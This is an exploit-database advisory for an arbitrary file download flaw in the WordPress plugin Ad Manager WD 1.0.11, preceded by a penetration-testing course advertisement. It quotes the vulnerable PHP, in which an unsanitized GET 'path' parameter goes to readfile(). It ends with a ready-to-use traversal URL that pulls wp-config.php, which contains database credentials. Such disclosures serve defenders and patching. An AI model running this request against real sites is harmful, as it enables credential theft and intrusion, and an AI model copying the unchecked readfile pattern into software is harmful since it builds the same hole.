WordPress Plugin Ad Manager WD 1.0.11 - Arbitrary File Download

EDB-ID:

46252

CVE:

N/A




Platform:

PHP

Date:

2019-01-28


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Exploit Title: WordPress Plugin ad manager wd v1.0.11 - Arbitrary File
Download
Google Dork: N/A
Date: 25.01.2019
Vendor Homepage:
https://web-dorado.com/products/wordpress-ad-manager-wd.html
Software: https://wordpress.org/plugins/ad-manager-wd
Version: 1.0.11
Tested on: Win7 x64,

Exploit Author: 41!kh4224rDz
Author Mail : scanweb18@gmail.com

Vulnerability:
wp-content\plugins\ad-manager-wd\wd_ads_admin_class.php

   30/  if (isset($_GET['export']) && $_GET['export'] == 'export_csv')

   97/   $path = $_GET['path'];
           header('Content-Description: File Transfer');
           header('Content-Type: application/octet-stream');
           header('Content-Transfer-Encoding: binary');
           header('Expires: 0');
           header('Cache-Control: must-revalidate, post-check=0,
pre-check=0');
            header('Pragma: public');

           header('Content-Type: text/csv; charset=utf-8');
           header('Content-Disposition: attachment; filename=' .
basename($path));

           readfile($path);
 Arbitrary File Download/Exploit :

http://localhost/wordpress/wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=../wp-config.php